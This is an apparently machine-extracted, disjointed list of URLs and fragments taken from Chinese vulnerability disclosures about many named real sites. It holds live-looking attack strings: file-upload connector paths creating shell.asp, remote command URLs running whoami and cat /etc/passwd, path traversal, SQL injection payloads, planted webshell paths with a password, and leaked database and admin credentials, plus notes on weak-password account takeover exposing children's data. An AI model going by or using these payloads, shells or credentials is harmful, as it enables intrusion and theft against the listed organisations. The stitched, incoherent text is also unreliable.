http://www.hongxing799.com/News/index.asp?Menu=%B9%AB%CB%BE%D0%C2%CE%C5 http://www.hongxing799.com/Products/List.asp?Bigid=312&smallid=281 http://www.hongxing799.com/admin/ http://www.hongxing799.com/fckeditor/editor/filemanager/browser/default/browser.html http://www.hongxing799.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684 http://kt.changhong.com/ http://www.sydoil.com/services_detail.asp?id=1629 ftp://wxshop.vivo.com.cn/ http://wxshop.vivo.com.cn http://li.yonyou.com/test.aspx http://www.jjhotels.cn/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://180.169.84.55:7001/ghwx/ http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274 http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274 http://www.gerunzs.com/products/ http://www.gerunzs.com/gerun_admin/admin_index.asp http://www.gerunzs.com/database/ http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274 http://www.gerunzs.com/fckeditor/ http://www.gerunzs.com/fckeditor/editor/ http://www.gerunzs.com/fckeditor/editor/filemanager/connectors/asp/ http://www.gerunzs.com/fckeditor/editor/dialog/ http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/browser.html http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/frmupload.html http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php http://www.gerunzs.com/test/ http://www.gerunzs.com/products/ http://www.gerunzs.com/images/ http://99pms.99inn.cc/ http://m.bypay.cn/invoker/JMXInvokerServlet http://**.**.**.**/ WxServer.asmx/GetMap http://dygx.scuec.edu.cn http://esn.chaoke.com http://www.upesn.com regfile:AAAAAAAAAAAAA regfile:AAAAAAAAAAAAA regfile:AAAAAAAAAAAAA regfile:AAAAAAAAAAAAA vbefile:XXXXXXXXXXXX vbefile:XXXXXXXXXXXX vbefile:XXXXXXXXXXXX vbefile:/../1.js vbefile:/../1.js vbefile:/../../../已知路径/1.js"的方式来执行这个文件。 http://**.**.**.**/test/all/cache.php vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 http://**.**.**.**/bugs/wooyun-2010-096413) http://**.**.**.**/app-res.html display:none http://**.**.**.**/app-res.html http://**.**.**.**/app-res.html http://m.12yao.com http://202.108.65.139:8080/axis2/axis2-admin/ http://202.108.65.139:8080/axis2/services/Cat/exec?cmd=whoami http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| http://**.**.**.**/test/all/readme.htm http://**.**.**.**/bugs/wooyun-2010-0175902 vbefile:/../../../已知路径/1.js vbefile:/../../../已知路径/1.js vbefile:/../../../缓存文件"的方式来执行恶意缓存文件。 vbefile:/../../../../../../../../../Users/用户名/AppData/Local/Temp/Maxthon3Cache/Temp/Webkit/Cache/缓存文件名 http://mail.jiashuangkuaizi.com http://www.99inn.cc/ForgetPassword/ https://ring0.me/2015/08/exploit-dns-server-with-one-packet/ http://youth.hznu.edu.cn/admin/login.php http://seeyonqd.seeyon.com/seeyon/index.jsp http://seeyonqd.seeyon.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy http://www.juse.or.jp/src/information/detail.php?im_id=165 http://game.touzhu.cn/PLBRegesterLogin.aspx?u1=9&u2=w051404这个位置没有验证码没有登录限制 http://zrds.zrhsh.cn/ZRapp/getSendAddressListByUserId http://**.**.**.**/ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/bea_wls_internal/wooyun.jsp password:w00yunjsp jdbc:oracle:thin:@**.**.**.**:1521:lgy http://zrds.zrhsh.cn/ZRapp/getLocationArea http://**.**.**.**/doc/refman/5.5/en/union.html http://**.**.**.**/bugs/wooyun-2016-0170481 http://211.150.76.88:8000/console http://www.jsf.or.jp/common/scheduleMonth.php?date= http://www.jsf.or.jp/common/scheduleMonth.php?date= http://**.**.**.**/bugs/wooyun-2016-0174251,他的是一个链接自带cookie的,然后就无需cookie了。 http://jixie.usst.edu.cn http://www.this.ne.jp/news/detail.php?nid=661 http://bjbio.cau.edu.cn http://ehome.zte.com.cn/admin/backendUi!login.do https://help.marketing.yahoo.co.jp http://m.taohv.cn/list.php?top_cat_id=31 https://**.**.**.**/p/chromium/codesearch#chromium/src/chrome/browser/devtools/devtools_ui_**.**.**.**&sq=package:chromium&type=cs&l=638)里提到了chrome-devtools的一个本地文件读取的漏洞(情报来自@sogili(长短短)) chrome-devtools://devtools/bundled/inspector.html?remoteBase=https://**.**.**.**/&remoteFrontend=true https://**.**.**.**/screencast_module.js http://exam.open.com.cn/matriculationonline/login.asp http://exam.open.com.cn/matriculationonline/login.asp http://m.finance.yahoo.co.jp http://m.finance.yahoo.co.jp/stock/holder?code=2294 http://file.locojoy.com/../../../../../../../../../../../../../etc/passwd http://www.acfun.tv/member/signSubmit.aspx http://www.acfun.tv/api/mail.aspx?name=newMail http://www.acfun.tv/api/friend.aspx?name=getFollowedList&pageNo=1&pageSize=10 http://www.acfun.tv/member/profile.aspx http://xxxxxx” http://**.**.**.**/news_detail.php?id=175 http://sjdy.inspur.com/app/servlet/validate http://189jk.cn http://erp.dmall.com/login?returnUrl=http%3A%2F%2Ferp.dmall.com%2F data:text/html,chromewebdata http://zjxds.glodon.com/index.php?m=admin http://echosystem.kibey.com/user/follow-list http://echosystem.kibey.com/index/code http://echosystem.kibey.com/index/reset-password http://echosystem.kibey.com/user/friend?page=1&platform=mobile http://zb-pre.glodon.com/ http://zb-pre.glodon.com/jmx-console/ http://m.candou.com/user/login/ http://acm.sdut.edu.cn/sdutoj/setting.php?userid=18790 http://sxyd.sdut.edu.cn/luntan/topic.asp?id=24 https://github.com/joyxee/yipeizhen/blob/44599f69a420bcab34447db6f3af43a679755609/build/classes/yk/util/email-config.properties http://cast.cau.edu.cn/BAGI/NationPrise/%E7%A4%BE%E5%9B%A2%E6%9C%BA%E5%85%B3%E4%BC%81%E4%BA%8B%E4%B8%9A%E5%8D%95%E4%BD%8D-%E4%BF%AE%E6%94%B9%E9%83%A8%E9%97%A8%E4%B8%8E%E4%BA%BA%E5%91%98.asp?xgID=64 http://core.csu.edu.cn www.letao.com http://www.letao.com http://maps.yahoo.co.jp http://maps.yahoo.co.jp/provider/api_world_category.php?output=xml&iso=&g2=&_i=1&g1=1 http://www.acmicpc.sdnu.edu.cn/xh/asingle.php?pg=3 http://www.letao.com/wap/pay/address.aspx?uuid145 http://www.letao.com/wap/app_download.aspx?op=bra http://218.193.130.165:8080/ http://218.193.130.165:8080/ http://**.**.**.**/guide/details.php?g=10%20AND%201=1--&btn_id=d-regist_20151022_B_menu_flow http://qjtyw.hznu.edu.cn http://**.**.**.** http://westsecu.21tb.com/login/login.logout.do http://icbe.cau.edu.cn content-type:text/html cache-control:no-cache http://**.**.**.**/bugs/wooyun-2010-0125719),上一个漏洞提到了http://**.**.**.**:8181/spam/system/index.action的通用密码。然而,tmailer不只8181端口有后台,2060端口还有一个更高端的后台,也存在写在代码中的通用密码,该密码在测试代码中。关于8181后台进入的更多内容,可以关注我的另一个漏洞:http://**.**.**.**/bugs/wooyun-2016-0176050,将在2016-04-03 https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://mail.t**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ http://**.**.**/gdrWeb/ user:tomcat pwd:tomcat http://**.**.**/gdrWeb/whoissb.jsp jdbc:oracle:thin:@10.47.0.66:1521:gpay https://**.**.**.**/guide/category.php?c=3,丢入sqlmap跑 http://shop.zymk.cn/index.php/goods/index/id/3774 http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp http://**.**.**.**/index.php?app=search&vip=1&act=seller&classid=435&type=img http://www.anxiang.gov.cn/jact/front/front_mailwrite.action http://**.**.**.**/bugs/wooyun-2015-0140915 http://app.cheshi.com/topic/1027jeep/insert.php http://traveler.cnooc.com.cn/names.nsf http://traveler.cnooc.com.cn/names.nsf中去找管理组成员 http://**.**.**.**/bugs/wooyun-2010-037211) http://shop.zymk.cn/index.php/home/category/index/id/1?order=click_count http://www.pkuedupx.com/newsview.php?cid=161 http://**.**.**.**/s/1i4kApfR http://rb.tcl.com/shell.jspx http://www.enet.com.cn/house/housesearch.jsp http://imserver.xiaozhu.com:8080/leave?fromUserClientType=ios&fromUserId=1823761635&sessionId=b7f0e6b0bb8faa927c9f4f8578ff0c83&token=e26deec63251aa67274c3eaa1d0570d8 http://www.res.cqu.edu.cn/newslist.php?key=A%%27%20union%20select%201,@@basedir,3,4,5,6,7,8,9,0,1%23 http://dichan.sina.com.cn/ http://ncfz.cau.edu.cn/newsshow.aspx?board=%CE%C4%BC%FE%CD%A8%D6%AA&id=114 http://www.mkzhan.com/index.php/read/showTucao/ http://www.kankan.com/ http://vod.kankan.com/v/85/85338.shtml http://20160225.float.sandai.net/finalfiles/n1455701640467.flv http://float.sandai.net/finalfiles/n1454753296536.flv http://dev.anzhuoapk.com/ http://dev.anzhuoapk.com/application/AppShoufa/details?shoufaid=5960 http://dev.anzhuoapk.com/application/application/details?app_id=67513 http://dev.anzhuoapk.com/application/AppShoufa/details?shoufaid= http://mapp.dahuatech.com http://jiaowu.sicau.edu.cn http://www.onceok.com.tw/)首页: http://43.241.211.74:8080/ http://43.241.211.74:9000/ http://www.onceok.com.tw/)主站首页: http://edf.cqu.edu.cn http://haomaiyi.com/.git/config http://git.shiyijian.cc/users/sign_in http://sentry.shiyijian.cc/register/ http://122.226.44.21:5555/ http://ecases.medlive.cn/list-zhuanqu-132.html?issearch=1&searchcontent=e&searchkey=1 http://dev.anzhuoapk.com/ http://t.cn/ http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5961&package=com.bccv.meitu&act=business http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5967&package=com.bccv.meitu&act=business key:m$a@i-t%i*a&n http://www.onceok.com.tw/scenic.php?id=1 http://z.mytest:81/是我host配来测试用的,复现时自己本地搭建一下环境吧~ http://**.**.**.**/dede http://**.**.**.**/xlcst.php https://github.com/ipconfiger/OpenStore/blob/master/settings.py mysql://root:123456@127.0.0.1:3306/orbit?charset=utf8 http://mall.easy-pec.com/ecmall/ http://mall.easy-pec.com/ecmall/toReg/toPerson.do http://mall.easy-pec.com/ecmall/verificationEmail/emailAndCodeCheck.do http://jk.tiexue.net/ https://**.**.**.**/cmccb/servlet/ccbNewClient http://studyinhznu.hznu.edu.cn http://scc.cau.edu.cn/scc/index.php?do=loginCheck&granttype=&password=1&username=schmksqh http://kxddjs.cqu.edu.cn/kxddjs/getContent.lxs?id=89 http://community.oppo.com/th/.svn/entries http://domain/sta/export/referrerSta.jsp http://domain/sta/export/chatTopicSta.jsp http://domain/sta/export/chatHoursSta.jsp http://domain/sta/export/chatUrlSta.jsp http://cscul.scuec.edu.cn/jeeadmin/jeecms/login.do http://api.m.zhuqu.com:8983/solr/ http://www.zhuqu.com:8983/solr/ http://m.zhuqu.com:8983/solr/ http://t.zhuqu.com:8983/solr/ http://{host}:{port}/seeyon/services/authorityService?wsdl http://**.**.**/a/2015/09-09/946261.html cn:8008 http://push.feng.com/index.php?r=api/client/startdevicecall http://www.oppodigital.com.tw/club_register.php?act=check_username&username= http://www.oppodigital.com.tw/club_register.php?act=check_username&username= http://guanli.letao.com/ http://guanli.letao.com/wap/shoe.aspx?add=&iid=123&pid=967243173 http://guanli.letao.com/wap/app_download.aspx?op=brand&bid=14 http://guanli.letao.com/wap/pay/address.aspx?tid=0&form=0&addressid=&aid=130706&cid=130700&pid=130000&uuid1453881206&add=&c=&op=newadd http://oa.tmt.tcl.com http://wooyun.org/bugs/wooyun-2015-0157774 http://denglish.e21.cn:80/ http://119.29.48.224/aboutUs.html http://alumni.cqu.edu.cn http://27894352.blog.hexun.com/104764428_d.html www.tudou.com http://www.tudou.com http://218.17.200.230:9004/casserver/login?service=http%3A%2F%2F218.17.200.230%2Fj_acegi_security_check http://218.17.200.230:9001/job/2010.jsp http://survey.minanins.com:9001/console/login/LoginForm.jsp http://extplat.minanins.com:8011/console/login/LoginForm.jsp http://simple.minanins.com:8021/console/login/LoginForm.jsp http://mail.minanins.com:9001/console/login/LoginForm.jsp http://woodscience.csuft.edu.cn/test/Common/GetDataHandler.ashx?departmentId=20&key=GetProfessionComboboxJson http://os.open.com.cn:80/WebApi_Public/Account/User/Login?username=admin&password=1111&%E6%8F%90%E4%BA%A4=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 http://os.open.com.cn:80/WebApi_Public/Account/User/Login?username=admin&password=1111&%E6%8F%90%E4%BA%A4=%E6%8F%90%E4%BA%A4%E6%9F http://120.197.138.117:50070/dfshealth.jsp http://wb.west95582.com/manage/login.html http://zabbix.xin.com/zabbix/ http://**.**.**.**/bugs/wooyun-2010-0170984 http://hzya.oicp.net:8080/ www.oicp.net属于花生壳 http://hzya.oicp.net:8080/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml jdbc:sqlserver://127.0.0.1:1433;database=nc55;sendStringParametersAsUnicode=false http://yjs.nwu.edu.cn/admin.php?mod=phpcms&file=login&referer=http%3A%2F%2Fyjs.nwu.edu.cn%2Fadmin.php http://oa.21tb.com/ http://218.197.70.92:1128/ http://218.197.70.92:1128/upload/users/dqy/in.jsp jjh.sdu.edu.cn/about.php?id=1&sid=1 http://recruit.usj.co.jp/career/information/index.html?archive=2015-07 http://218.94.40.6:8080/hrss/rm/RmMain.jsp?dsName=ncdl http://218.94.40.6:8080/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://**.**.**.**/login)存在jboss漏洞,目前能够成功溢出并上传网马,同事发现已经存在网马。 http://www.flyertrip.com/member/?dopost=vieworder&orderid=1228&ordertype=2 http://pub2.whut.edu.cn/trans/adminlogin.asp http://opac.hznu.edu.cn https://mall.nesc.cn/m/mall/index.html#!/main.html http://game.touzhu.cn登录位置有验证码限制 http://www.kesion.com/model/viewlist.aspx https://account.glodon.com http://servicea.glodon.com/admin_000_000_001.axml?q=eJyKjw8uSSxJtQ0tTi0KqSxIdS0qyi9Si48H8f0Sc1NtczJLszIT87JK8wAAAAD%2f%2fw%3d%3d http://weixin.glodon.com/index.php?m=Index&a=login http://bi.gldjc.com http://gix5-stag.glodon.com http://gix5.glodon.com http://mjjt.fwxgx.com http://yjz.glodon.com/index.do http://im.guodu.com:9090/live/p.do?command=leaveMessage&c=1&v=11c69daab9b04b14843da30a70d07253&u=11c69daab9b04b14843da30a70d07253&f=1&lang=sc http://denglish.e21.cn:80/ http://**.**.**.**/: http://ht.myaora.net:82 http://dealer.youxinpai.com/login/index/ http://skin.maxthon.cn这个是傲游皮肤中心的网站,登录框无登录限制 http://lgradio.sdut.edu.cn/guangbotaizj/list.asp?bumen=-1 http://lgradio.sdut.edu.cn http://ast.cqu.edu.cn/ast/contentmetting.jsp?hyid=655 http://**.**.**.**/bugs/wooyun-2015-0151898 Author:liucj sqlite:/icac/db/icac_cfg/icac_cfg.db http://shop.boqii.com/ajax.html?ctl=productlist&act=proActivity http://www.roowei.com/js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7 content-type:text/html cache-control:no-cache http://59.108.32.40/NGOSS/login.action http://219.232.48.46/NGOSS/login.action http://59.108.80.106/NGOSS/login.action http://121.5.128.198/NGOSS/login.action http://59.108.32.40/NGOSS/login.action http://w.star.kankan.com/?birthday=2000&stature=170&level=0&sex=0&order=id http://playme.the9.com/user?method=account&id=1 http://playme.the9.com/user?method=account&id=1 http://localhost:8088/ws http://localhost:8088/ws/query?wsdl http://blog.onlylady.com http://m.baozoumanhua.com这个登录位置没有验证码没有登录限制: http://222.168.65.172 http://m.163disk.com/m.163disk.com.zip http://jw.sthu.edu.cn/service.asmx?op=GetStuCheckinInfo的soap请求放在burp xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string http://112.124.211.169:8089/ http://112.124.211.169:8089/services/Cat/exec?cmd=cat%20whoami http://www.meishichina.com/Topic.rar http://www.meishichina.com/YuanLiao.rar http://do.meishichina.com/phpmyadmin/ http://cdn.meishichina.com/phpmyadmin/ http://do.meishichina.com/1.php http://cdn.meishichina.com/1.php http://118.244.233.114:8080/ http://www.onceok.com.tw/store.php?id=10123396&goods_type_id=gt00000001 http://www.onceok.com.tw/store.php?id=10123396&goods_type_id=gt00000001 http://kygl.jgsu.edu.cn/kygl/PersonalIntroduce.aspx?userid=2613 http://mkdd.zymk.cn/admin.php http://mkdd.zymk.cn/index.php/gonglve/show?id=118 http://mkdd.zymk.cn/index.php/gonglve/show?id=118 http://sqlmap.org coding:utf-8 http://skyhome.skyworthbox.com/ http://westsecu.21tb.com/login/login.logout.do http://rexian.e23.cn/ http://yjs.xust.edu.cn/enrollment_work.asp?id=36&bh=661 http://manu34.magtech.com.cn/Journalx_xidian/Login.action;jsessionid=80E632DFF08F795B45457D3E878D4344 http://webchat.haohaizi.com/ admin:admin http://dns.admin5.com/phpinfo.php http://ec.admin5.com/include/downmix.inc.php http://ad.admin5.com/.svn/entries index.php/Index/dofindPsd http://jjc.xidian.edu.cn http://zs.vivo.com.cn/vivo.zip http://search.zaojiao.com/search/cat?cids=1&t=mrwy http://www.mysleepace.com/cn/Index/goods/id/2*/nav/2/attr/0/shop_count/1/p/2/0/shop_count.html http://www.oohaney.com/Trip/lists?cid=1 http://research.enet.com.cn/questionnaire/publish/CountPaper.jsp?paperID=0002000114b9b6c3c9 http://guanli.letao.com/letaozu/articlelist.aspx?id=1697 http://www.api.zhuna.cn/e/json_app.php?agentId=182&hid=25306&orderfrom=182&os=iphone&tm1=2016-02-28&tm2=2016-02-29&unionId=0&ver=20&version=3.2.7 http://58.211.5.203/admin/ https://github.com/wmrococo/idsync/blob/2da7845ca98b1a32acaab2cc008e729f6628f137/src/main/java/cn/com/admaster/utils/MailHelper.java https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982962&type=0 https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982960&type=0 https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982949&type=0 https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982223&type=0 http://vip.now.net.cn/.git http://vip.now.net.cn/api/svn_host.php http://webmail.now.net.cn/api/svn_host.php http://webmail.now.cn/api/svn_host.php http://mx600.now.net.cn/api/svn_host.php http://mx601.now.net.cn/api/svn_host.php http://mx602.now.net.cn/api/svn_host.php http://mx603.now.net.cn/api/svn_host.php http://mx604.now.net.cn/api/svn_host.php http://mx605.now.net.cn/api/svn_host.php http://mx606.now.net.cn/api/svn_host.php http://mx621.now.net.cn/api/svn_host.php http://mx622.now.net.cn/api/svn_host.php http://mx623.now.net.cn/api/svn_host.php http://mx626.now.net.cn/api/svn_host.php http://mx629.now.net.cn/api/svn_host.php http://ka.263.net/ http://ka.263.net/api.php http://career.upc.edu.cn/enterprise/detail.asp?id=*&xl=%B1%BE%BF%C6 http://**.**.**.**/WF_YB/upload/css.jsp http://**.**.**.**/WF_YB/upload/css.jsp http://**.**.**.**/WF_YB/upload/css.jsp http://m.zznissan.com.cn http://acm.sdut.edu.cn/sdutoj/contest_show.php?contest_id=1682 http://acm.sdut.edu.cn/sdutoj/contest_status.php?cid=1682 http://acm.sdut.edu.cn/sdutoj/problem.php?action=showproblem&problemid=1000 http://acm.sdut.edu.cn/sdutoj/setting.php?userid=20789 http://po.myaora.net:81/rechange/act.php?t=web&id=2 https://app.yinxiang.com/Registration.action http://www.oppodigital.com.tw/.svn/entries http://www.bjtu-hedu.com/ http://www.bjtu-hedu.com/include/config.inc.php?-s http://www.bjtu-hedu.com/search/index.php?-s http://**.**.**.**/bugs/wooyun-2016-0178904 http://www.heinet.cn/cacti/ http://58.61.161.99 https://175.25.168.142 http://122.11.39.87/.svn/entries http://**.**.**/seePublicInfo.doid=23&a=1 http://59.37.32.133/ http://www.vipkid.com.cn/forget NULL:null https://github.com/evolsnow/python-example/blob/6c6bb569367a9c3c3ff882a0fb10fd4e4e39f06b/zmz.py https://github.com/MrWhoareyou/course/blob/e5d8cffcd21cec4ead96ef89ae521f6480f7fd32/Application/Common/Conf/config.php http://oa.21tb.com/ http://danlu.com/ http://101.200.142.42/ https://github.com/mGoogle/LearnGit/blob/231c93d5304c34f45815d76eb1d41808c8a7a1ec/account.txt http://182.92.230.201/svn/oc/%E5%95%86%E6%88%B7%E5%8F%B7%E4%B8%8E%E5%95%86%E6%88%B7%E8%B5%84%E6%96%99/ http://182.92.230.201/svn/oc/oc/%E5%9F%BA%E7%A1%80%E4%BF%A1%E6%81%AF/POS%E6%9C%BA%E7%AE%A1%E7%90%86/ http://182.92.230.201/svn/pm/01.%E7%AE%A1%E7%90%86%E6%96%87%E6%A1%A3%E5%BA%93/0102.%E4%BA%BA%E5%91%98%E7%AE%A1%E7%90%86/ http://182.92.230.201/svn/op/ssl/www.danlu.com%E6%AD%A3%E5%BC%8F/ http://openmail.qq.com/cgi-bin/dy_template?t=dy_iframe&sid=SIIWuQeaF-YjcmA2#column/modify/1329563954t3814693792t12721 http://hjsm.tom.com/登录位置无验证码无限制 http://wooyun.org/bugs/wooyun-2016-0177667 http://dev.anzhuoapk.com/ http://gameuser.pipi.cn:8080/,存在目录遍历,可查看上传文件绝对路径、数据库配置、库文件、支付宝配置文件、大量源码等敏感信息。 http://cas.xtepchina.com/ http://cast.xtepchina.com jdbc:jtds:sqlserver://192.168.3.94:1433/txtep jdbc:jtds:sqlserver://192.168.3.112:1433/xtep http://bi.xtepchina.com:8090/loginIn.action http://lsh.xtepchina.cn/selfhelp/Attendance.aspx http://101.251.233.156:9200/_search?preety http://101.251.233.156:9200/_nodes http://101.251.233.156:9200/_plugin/head/ http://**.**.**.**/TR/html4/loose.dtd http://www.gjzq.cn/ http://139.210.101.102:8888/2013yangcai http://139.210.101.102:8888/2013yangcai/Edit/editor/filemanager/browser/default/browser.html?Type=File&Connector=http://139.210.101.102:8888/2013yangcai/Edit/editor/filemanager/connectors/asp/connector.asp http://139.210.101.102:8888/2013yangcai/admin/admin_index.asp http://newsletter2.51cto.com/new/openStats.php?serial=5629&email=xxxxxxx@gmail.com https://**.**.**.**/gh0std4ncer/lizkebab,修改其 http://club.astro.sina.com.cn/ http://club.tech.sina.com.cn/ http://club.news.sina.com.cn/ http://club.life.sina.com.cn/ http://club.eladies.sina.com.cn/ http://club.history.sina.com.cn/ http://club.mil.news.sina.com.cn/ http://club.baby.sina.com.cn/ http://club.baby.sina.com.cn/ http://**.**.**.**/login.jsp,利用常用用户名和弱口令123456可获得一个有效账号,登陆后爬取所有用户名,再用爬取用户名和弱口令123456获得400多个账号,登陆后,可查看80多万儿童姓名、身份证号、照片、家庭住址,有些还包含银行卡号。 http://**.**.**.**/findPw/sendSelectMail.php?select=2 http://218.75.221.153:9090/eis/index.action http://218.75.221.153:8088/eis/index.action http://218.75.221.153:8088/eis/guige.jsp http://zabbix.haowu.com/zabbix http://183.56.132.135:50070 http://**.**.**.**/login.do http://**.**.**.**/login.do http://**.**.**.**/ http://**.**.**.**/login.do http://**.**.**.**/ http://**.**.**.**/ data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E https://meican.com/account/directlogin http://www.cmreltd.com:80/ www.cmreltd.com http://android.myapp.com/myapp/detail.htm?apkName=com.netschool.main.ui http://ns.huatu.com/nsapi/base/captcha/phone b4:8b:30 teacher.huatu.com/admin/edit.php?cid=2882 http://202.120.144.60:80 http://android.myapp.com/myapp/detail.htm?apkName=com.ht.exam http://jpkc.dhu.edu.cn/yysj1/bulletin.aspx?bid=24 http://in.iflytek.com/ChangePwd/ http://mq.vcooline.com:9200/_plugin/head/../../../../../../opt/nginx/conf/nginx.conf http://**.**.**.**/html/solution/success_case/2014/0903/82.html http://119.254.68.150 http://119.254.68.150//login_bj.jsp http://119.254.68.150//WEB-INF/classes/tiles-def.xml http://61.152.171.123:8888/hereditary_sharing/welcome/welcome.action http://techsupport.phicomm.com/products_ent_list.html https://www.xkzb.wang/ http://st.renren.com https://openscanner.cc/index https://121.201.28.146/ http://**.**.**.**/bugs/wooyun-2016-0181024,后来又发现延边州也存在这个未授权访问,因此就使用google进行搜索,inurl:/archive/login.jsp,发现如下系统 http://**.**.**.**/bugs/wooyun-2016-0181024 http://59.41.186.91:8007/chat/question/searchQuestion.action http://101.198.161.9搜了下下的是360的地址 http://**.**.**.**:9080/sportV2/ http://**.**.**.**:9080/pasweb/ http://**.**.**.**:9080/gaweb https://**.**.**.**:8880 http://**.**.**.**/HBRC_User/Public/login.html http://**.**.**.**/HBRC_Home/Resume/content/id/696200/code/233a.html url:http://**.**.**.**/HBRC_User/Resume/edit/id/701120.html http://**.**.**.**/bugs/wooyun-2016-0167905 urn:getUserOrgList SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:xsd="http://**.**.**.**/1999/XMLSchema xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance xmlns:m0="http://**.**.**.**/ xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/ xmlns:urn="http://user.webservice.turbomail SOAP-ENV:Header/ SOAP-ENV:Body urn:getUserOrgList urn:apiName urn:apiName urn:apiPassword urn:apiPassword urn:userName urn:userName urn:domain urn:domain urn:resultType urn:resultType urn:getUserOrgList SOAP-ENV:Body SOAP-ENV:Envelope http://**.**.**.**/bugs/wooyun-2010-0174305 http://**.**.**.**/mailmain?type=getmd5sid1&username=postmaster&domain=root http://**.**.**.**/mailmain?type=login&uid=postmaster&domain=root&md5sid=9946d95d95ab011fbb1836378335e2f9 http://**.**.**.**/bugs/wooyun-2010-0176317 http://220.181.29.155:9333 http://192.168.52.69/admin/authc/loginpage?AUTHC_SUCCESS_TO_REDIRECT=%2Fadmin%2Fprojectshow http://**.**.**.**/ http://**.**.**.**:8888/manage http://**.**.**.**:8888/script encap:Ethernet fe51:f8/64 Scope:Link http://www.8477.com/e/class/sendnumber.php?a=review_dl&callback=jQuery183020776667445898056_1457193791259&id=1 http://www.8477.com/e/tags/index.php?page=1&tagname=%E7%8E%8B%E8%80%85%E8%8D%A3%E8%80%80&line=10 http://www.8477.com/e/tags/index.php?page=1&tagname=%E7%8E%8B%E8%80%85%E8%8D%A3%E8%80%80&line=10&tempid=15 https://github.com/myhongkongzhen/pro-module-zzwu/blob/e5db398b333bf3de43165c88150802a066eab147/demo-activemq/demo-avtivemq-consumer/src/main/resources/mail.properties url:http://www.cnoocengineering.com/manage/login.aspx http://www.cnoocengineering.com/manage/upload_file.aspx http://www.cnoocengineering.com/UploadFile/201636/TYTCJSM201636.aspx http://202.69.27.130:8080/ www.jxnews.com.cn https://117.40.143.160:8880/ http://**.**.**.**/fabu/41667.jhtml http://**.**.**.**/ http://**.**.**.**/news/13471 http://**.**.**.**/GIIS/Account/Login.aspx,登陆处无限制,用弱口令123456获得10个账号。 http://**.**.**.**:9020/netrep/index.jsp http://**.**.**.**:9020/console/ http://**.**.**.**:9020/shuaige/whoami.jsp http://**.**.**.**/news_list.php?i=....”,使用sqlmap验证。(注意:使用base64encode.py作为tamper) http://**.**.**.**/news_list.php?i= http://**.**.**.**/news_list.php?i= http://**.**.**.**/news_list.php?i= http://**.**.**.**/news_list.php?i= http://jders.midea.com.cn/ http://jders.midea.com.cn:8001/ERSService.asmx?WSDL http://tempuri.org/searchUsers http://task.www.sogou.com http://task.www.sogou.com/monitorresult?search_name=&search_id=1&tasksubmit=true http://s.shouji.sogou.com/sogouOemAdmin/fradminnew/index.jsp http://s.shouji.sogou.com/sogouOemAdmin/oemadmin/index.jsp http://s.shouji.sogou.com http://202.104.30.185/fckeditor/editor/fckeditor.html http://202.104.30.185//UserFiles/Image/yjh.jsp http://group.laiyifen.com/index.php/article-gonggao-lists-1*-2.html http://wx.rrkd.cn http://60.13.13.239:8080/yyoa/ url:http://**.**.**.**/service url:http://**.**.**.**/web/login.html http://**.**.**.**/web/upload/file/20160308/98106aa7-af55-448e-9106-b55f413872a9.asp url:http://**.**.**.**/hyweb/WEB/ http://www.dfzq.com.cn/dfzq.rar jdbc:oracle:thin:@**.**.**.**:1521:hr user:chis_2015 df.tc/0zprGp site:renren.com inurl:sid 